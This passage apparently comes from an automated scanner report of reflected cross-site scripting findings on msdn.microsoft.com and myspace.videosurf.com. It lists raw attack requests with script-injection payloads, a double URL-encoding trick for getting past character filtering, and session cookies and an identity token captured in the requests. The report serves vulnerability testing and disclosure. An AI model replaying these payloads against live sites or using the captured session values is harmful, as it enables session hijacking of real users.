Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:00 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcffb"><a>734127f3eb7/ms691105(VS.85)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 676ce%2522%253e%253ca%253e1ab5e936dbc was submitted in the REST URL parameter 3. This input was echoed as 676ce"><a>1ab5e936dbc in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/ms691105(VS.85).aspx676ce%2522%253e%253ca%253e1ab5e936dbc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms691105(VS.85).aspx676ce"><a>1ab5e936dbc" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389b8%2522%253e%253ca%253e0c832b23844 was submitted in the REST URL parameter 1. This input was echoed as 389b8"><a>0c832b23844 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:03 GMT
Content-Length: 9174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us389b8"><a>0c832b23844/library/ms951681" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27641%2522%253e%253ca%253ec797046cb99 was submitted in the REST URL parameter 2. This input was echoed as 27641"><a>c797046cb99 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:35 GMT
Content-Length: 9174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library27641"><a>c797046cb99/ms951681" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff27%2522%253e%253ca%253e96af2b045ba was submitted in the REST URL parameter 3. This input was echoed as aff27"><a>96af2b045ba in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:05 GMT
Content-Length: 9184
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms951681.aspxaff27"><a>96af2b045ba" /> ...[SNIP]...
2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://msdn.microsoft.com
Path:
/en-us/ms348103.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f8f"><a>bfa3d2aff44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44e4"><script>alert(1)</script>9820aeb12bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3100d"><script>alert(1)</script>0c1559a14fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa"/> ...[SNIP]...
2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ecd"><script>alert(1)</script>f0a2b614e24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c1"><script>alert(1)</script>e2ff8386fd8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b463c"><script>alert(1)</script>bb705bdfbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3"/> ...[SNIP]...
2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://myspace.videosurf.com
Path:
/video/saved-by-the-belding-1247850355
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b3c"><script>alert(1)</script>6a1ae5d1e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a71b"><script>alert(1)</script>fd17ed3156e was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fbd"><script>alert(1)</script>eb255840b05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05"/> ...[SNIP]...
2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a112e"><script>alert(1)</script>0e0865bbed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fed"><script>alert(1)</script>d56583518f8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?vlt=myspacec1fed"><script>alert(1)</script>d56583518f8 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90bf"><script>alert(1)</script>b08b07e4154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml ...[SNIP]... <meta property="og:url" content="http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528d90bf"><script>alert(1)</script>b08b07e4154"/> ...[SNIP]...
2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f62dd"><script>alert(1)</script>f13f92228eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528?f62dd"><script>alert(1)</script>f13f92228eb=1 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3dc97"><script>alert(1)</script>4f0431d3213 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/the-invisibles-part-one-seaworld-english-1239815528?vlt=myspace3dc97"><script>alert(1)</script>4f0431d3213 HTTP/1.1 Host: myspace.videosurf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
